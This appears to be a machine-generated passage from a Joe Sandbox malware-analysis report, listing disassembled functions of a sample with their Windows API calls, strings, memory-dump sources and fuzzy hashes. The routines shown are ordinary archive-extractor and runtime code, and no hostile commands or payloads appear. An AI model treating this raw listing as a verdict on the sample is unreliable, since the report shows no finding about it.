        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$_wcsrchr
        • String ID: .exe$.rar$.sfx
        • API String ID: 3513545583-31770016
        • Opcode ID: c625d2748296bbb84bc811c16aaa2e660608d66fe19be7cffcfcb3ceeed99a47
        • Instruction ID: 5410103a96e8711a84b4f4b9918a280563d59754f679c2f724ff5b10737b52a8
        • Opcode Fuzzy Hash: c625d2748296bbb84bc811c16aaa2e660608d66fe19be7cffcfcb3ceeed99a47
        • Instruction Fuzzy Hash: 5B414822504330AAC735AF74F842A7FB3B8EF6474DF15490EF9969B181E7A08DA1C395
        Function 0013DFBA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
        Download Yara Rule
        APIs
        • GetTempPathW.KERNEL32(00000800,?), ref: 0013DFD0
          • Part of subcall function 0012CAA0: _wcslen.LIBCMT ref: 0012CAA6
        • _swprintf.LIBCMT ref: 0013E004
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • SetDlgItemTextW.USER32(?,00000066,00172892), ref: 0013E024
        • EndDialog.USER32(?,00000001), ref: 0013E131
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
        • String ID: %s%s%u
        • API String ID: 110358324-1360425832
        • Opcode ID: cddc27c9b859f265cf611556eaaca05d8b09fddc23a8ba3a19d394d6e398cd0b
        • Instruction ID: 64eed1eb185553ff328cfec5b1d1d36580be6c8d51b7fd2abb12af2082482251
        • Opcode Fuzzy Hash: cddc27c9b859f265cf611556eaaca05d8b09fddc23a8ba3a19d394d6e398cd0b
        • Instruction Fuzzy Hash: 50415E75900258AADF25DBA0DC45EEE77FCEB14704F4080A6F90DA7091EF719A858F61
        Function 0012CF32 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
        Download Yara Rule
        APIs
        • _wcslen.LIBCMT ref: 0012CF56
        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0012B505,?,?,00000800,?,?,0012B4CA,?), ref: 0012CFF4
        • _wcslen.LIBCMT ref: 0012D06A
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$CurrentDirectory
        • String ID: UNC$\\?\
        • API String ID: 3341907918-253988292
        • Opcode ID: da0780a5669bcd76bc4a6ad4a348db676ba1e6ca8efeeab01de7b59dbbb99cd5
        • Instruction ID: 6ddb8f6ca157e8af4b60dcec6fb37a51ef25e04641fac09416ac7a3f55d3c67f
        • Opcode Fuzzy Hash: da0780a5669bcd76bc4a6ad4a348db676ba1e6ca8efeeab01de7b59dbbb99cd5
        • Instruction Fuzzy Hash: 14411631440239BBCF21AF20FC01EEE73A9EF14395F244025F864A7061E770D9A2CBA5
        Function 0013C8BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
        Download Yara Rule
        APIs
        • LoadBitmapW.USER32(00000065), ref: 0013C8CD
        • GetObjectW.GDI32(00000000,00000018,?), ref: 0013C8F2
        • DeleteObject.GDI32(00000000), ref: 0013C924
        • DeleteObject.GDI32(00000000), ref: 0013C947
          • Part of subcall function 0013B6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0013C91D,00000066), ref: 0013B6D5
          • Part of subcall function 0013B6C2: SizeofResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B6EC
          • Part of subcall function 0013B6C2: LoadResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B703
          • Part of subcall function 0013B6C2: LockResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B712
          • Part of subcall function 0013B6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0013C91D,00000066), ref: 0013B72D
          • Part of subcall function 0013B6C2: GlobalLock.KERNEL32(00000000), ref: 0013B73E
          • Part of subcall function 0013B6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0013B762
          • Part of subcall function 0013B6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0013B7A7
          • Part of subcall function 0013B6C2: GlobalUnlock.KERNEL32(00000000), ref: 0013B7C6
          • Part of subcall function 0013B6C2: GlobalFree.KERNEL32(00000000), ref: 0013B7CD
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
        • String ID: ]
        • API String ID: 1797374341-3352871620
        • Opcode ID: 675e91177a3769553ed36d29c6b67c3681868898b8e9e3641acd0594793fbaef
        • Instruction ID: 2fcf49234ae817d3faee55723c30c6ec7e2e267ddfe87d228fdb8bd696772bd5
        • Opcode Fuzzy Hash: 675e91177a3769553ed36d29c6b67c3681868898b8e9e3641acd0594793fbaef
        • Instruction Fuzzy Hash: E701D23290071567DB1167749C4ABBF3ABBDF91B65F160010FA00B72A2EF618D0597E0
        Function 0013E740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • EndDialog.USER32(?,00000001), ref: 0013E78B
        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0013E7A1
        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0013E7B5
        • SetDlgItemTextW.USER32(?,00000068), ref: 0013E7C4
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ItemText$DialogParentWindow
        • String ID: RENAMEDLG
        • API String ID: 364370097-3299779563
        • Opcode ID: 3506db5854a7ace5e7543fc6a1b935c28405f9da4d74d6d2439089395de0b45e
        • Instruction ID: 239cbc2e00a316b6755415f249a494c78c39315b718cba1baf1453cd78818538
        • Opcode Fuzzy Hash: 3506db5854a7ace5e7543fc6a1b935c28405f9da4d74d6d2439089395de0b45e
        • Instruction Fuzzy Hash: 1801D433280310BBE6118B649C4DF677BDEFB69B02F100411F302A64D0C7A26A558BF5
        Function 00149225 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001491D6,00000000,?,00149176,00000000,0015D570,0000000C,001492CD,00000000,00000002), ref: 00149245
        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00149258
        • FreeLibrary.KERNEL32(00000000,?,?,?,001491D6,00000000,?,00149176,00000000,0015D570,0000000C,001492CD,00000000,00000002), ref: 0014927B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: ed193f1faacb63baac98f4850d5e5c49d6f17c41c0fb0ae5300fd8b08b052758
        • Instruction ID: 316ca8fc0cd5f1093df03783f332f09acf6cc26dd0444b4d0d80318755bd5235
        • Opcode Fuzzy Hash: ed193f1faacb63baac98f4850d5e5c49d6f17c41c0fb0ae5300fd8b08b052758
        • Instruction Fuzzy Hash: 61F04F34A10218FBDF119BA4EC09FAEBFB4EF04716F0001A5F905BA5A0DB705EC4CA90
        Function 00130620 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00131B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00131B4F
          • Part of subcall function 00131B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00130633,Crypt32.dll,00000000,001306AD,00000200,?,00130690,00000000,00000000,?), ref: 00131B71
        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0013063F
        • GetProcAddress.KERNEL32(0016A1F0,CryptUnprotectMemory), ref: 0013064F
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressProc$DirectoryLibraryLoadSystem
        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
        • API String ID: 2141747552-1753850145
        • Opcode ID: 04778ff9b2f9e7c46378a6a712ec7d4debb001d00447ab9d76fd6702b03acbef
        • Instruction ID: feebb791d898520b38b5e50d279d26fcaeadeb79383d536b3d9c4a89628268ed
        • Opcode Fuzzy Hash: 04778ff9b2f9e7c46378a6a712ec7d4debb001d00447ab9d76fd6702b03acbef
        • Instruction Fuzzy Hash: 9DE026B0805340DFD7215F349809B42BFE05F2870AF00880DFAD597580D7B0C0C48B00
        Function 00143D5A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AdjustPointer$_abort
        • String ID:
        • API String ID: 2252061734-0
        • Opcode ID: 468bacfc350c9c96c055382ddf1f8263f6243b6c3b06ba321d505d399890733a
        • Instruction ID: 674a5894659ddffd17342afbd17c7cf1013bb4341af1fb4ef5f3646488fc1450
        • Opcode Fuzzy Hash: 468bacfc350c9c96c055382ddf1f8263f6243b6c3b06ba321d505d399890733a
        • Instruction Fuzzy Hash: AF510771A02206AFEF299F54D845BBA77A4EF50310F14452DEC26A72B1E731EE80CB90
        Function 0014D0E0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
        Download Yara Rule
        APIs
        • GetEnvironmentStringsW.KERNEL32 ref: 0014D0E9
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0014D10C
          • Part of subcall function 0014A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014DBDC,00000000,?,001480A1,?,00000008,?,0014A861,?,?,?), ref: 0014A820
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0014D132
        • _free.LIBCMT ref: 0014D145
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0014D154
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
        • String ID:
        • API String ID: 336800556-0
        • Opcode ID: 74a4735917ede0b702fd1e4b082ca40e074ac18b315bf5bc617d0ad70a75faea
        • Instruction ID: 13552c8a16dc4c4d6aca627e6367dba95aedf5ce8ffcbeb771623ea3ade28a90
        • Opcode Fuzzy Hash: 74a4735917ede0b702fd1e4b082ca40e074ac18b315bf5bc617d0ad70a75faea
        • Instruction Fuzzy Hash: FE01A272602615BF2B211BB67C8CC7B6A6DEFD2FA67150139FD04C7220EB709C8281B1
        Function 0014A589 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetLastError.KERNEL32(?,00163070,00000200,0014A7E0,00147586,?,?,?,?,0012ECA4,?,02FB3C18,00000064,00000004,0012EA30,?), ref: 0014A58E
        • _free.LIBCMT ref: 0014A5C3
        • _free.LIBCMT ref: 0014A5EA
        • SetLastError.KERNEL32(00000000,00154ADC,00000050,00163070), ref: 0014A5F7
        • SetLastError.KERNEL32(00000000,00154ADC,00000050,00163070), ref: 0014A600
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorLast$_free
        • String ID:
        • API String ID: 3170660625-0
        • Opcode ID: 987aab1d4aeb6433178acb8c9776fa35e8a7a7772737608c97067d2614f5089b
        • Instruction ID: fe0997f312e2b80fef70c09c62d82455e79c45cc4e439d3fe10bf8834e0383c4
        • Opcode Fuzzy Hash: 987aab1d4aeb6433178acb8c9776fa35e8a7a7772737608c97067d2614f5089b
        • Instruction Fuzzy Hash: A50144362C5601A7821627746E49D5B212E9FE03713B30028F9089B1B1FF708E815062
        Function 0014D9AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • _free.LIBCMT ref: 0014D9C7
          • Part of subcall function 0014A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC), ref: 0014A670
          • Part of subcall function 0014A65A: GetLastError.KERNEL32(00154ADC,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC,00154ADC), ref: 0014A682
        • _free.LIBCMT ref: 0014D9D9
        • _free.LIBCMT ref: 0014D9EB
        • _free.LIBCMT ref: 0014D9FD
        • _free.LIBCMT ref: 0014DA0F
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: 24bc57bfd4cf0b11a69d6f048463fc86bd8f615b2fad9940e2232c3d2316f4be
        • Instruction ID: 7383fbb5a61f7d1d4576755d342825dd381aab8167d4722e87a828f439fd9eef
        • Opcode Fuzzy Hash: 24bc57bfd4cf0b11a69d6f048463fc86bd8f615b2fad9940e2232c3d2316f4be
        • Instruction Fuzzy Hash: 61F0B273545210AB8B21DF68F98AC1A77E9BF187517EA0C06F48CE7961CBB1FCC08655
        Function 00133328 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
        Download Yara Rule
        APIs
        • _wcslen.LIBCMT ref: 00133330
        • _wcslen.LIBCMT ref: 00133341
        • _wcslen.LIBCMT ref: 00133351
        • _wcslen.LIBCMT ref: 0013335F
        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0012C844,?,?,00000000,?,?,?), ref: 0013337A
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$CompareString
        • String ID:
        • API String ID: 3397213944-0
        • Opcode ID: 34b634918e1fd0d0cc8e6ce33f64371cb0e9a974408b75b8b3adba94dedc8749
        • Instruction ID: 9e047dbf0b4b8dc85f428412c88b93edc311f51bc6e868bdc5deeb74e143b52d
        • Opcode Fuzzy Hash: 34b634918e1fd0d0cc8e6ce33f64371cb0e9a974408b75b8b3adba94dedc8749
        • Instruction Fuzzy Hash: C9F01736008214BFCF162F55EC09DCE3F26EB58B71B218425F6296E071CF7296959694
        Function 00149CC0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
        Download Yara Rule
        APIs
        • _free.LIBCMT ref: 00149CDE
          • Part of subcall function 0014A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC), ref: 0014A670
          • Part of subcall function 0014A65A: GetLastError.KERNEL32(00154ADC,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC,00154ADC), ref: 0014A682
        • _free.LIBCMT ref: 00149CF0
        • _free.LIBCMT ref: 00149D03
        • _free.LIBCMT ref: 00149D14
        • _free.LIBCMT ref: 00149D25
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: b8198bb9fdd43e6646ea12afe20a90701c7339f14e8f1c84a4e55abcb9800e5b
        • Instruction ID: 33fc1cca4d0a899dd9aaa21d1c71b406940f205369d6d423fbb28f3fa4ede60d
        • Opcode Fuzzy Hash: b8198bb9fdd43e6646ea12afe20a90701c7339f14e8f1c84a4e55abcb9800e5b
        • Instruction Fuzzy Hash: 90F01274846122DFCB026F14FD464063BA2FB397213870606F55957A71CF720AD18B85
        Function 0013B80C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 238COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0013B699: GetDC.USER32(00000000), ref: 0013B69D
          • Part of subcall function 0013B699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0013B6A8
          • Part of subcall function 0013B699: ReleaseDC.USER32(00000000,00000000), ref: 0013B6B3
        • GetObjectW.GDI32(?,00000018,?), ref: 0013B83C
          • Part of subcall function 0013BACE: GetDC.USER32(00000000), ref: 0013BAD7
          • Part of subcall function 0013BACE: GetObjectW.GDI32(?,00000018,?), ref: 0013BB06
          • Part of subcall function 0013BACE: ReleaseDC.USER32(00000000,?), ref: 0013BB9E
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ObjectRelease$CapsDevice
        • String ID: (
        • API String ID: 1061551593-3887548279
        • Opcode ID: 8259913505b27fa6ec7e5d0d34ca0faa201bcd4b88899a30211c931963965f94
        • Instruction ID: 431f1d5da6940d0a40fabb182d4a4d24abf1fc7f4ba1d383b9bf80262c5939d5
        • Opcode Fuzzy Hash: 8259913505b27fa6ec7e5d0d34ca0faa201bcd4b88899a30211c931963965f94
        • Instruction Fuzzy Hash: 15910070608750AFD710DF25D884A2BBBE9FFC8705F00491EF69AD7260DB30A885CB62
        Function 00132938 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
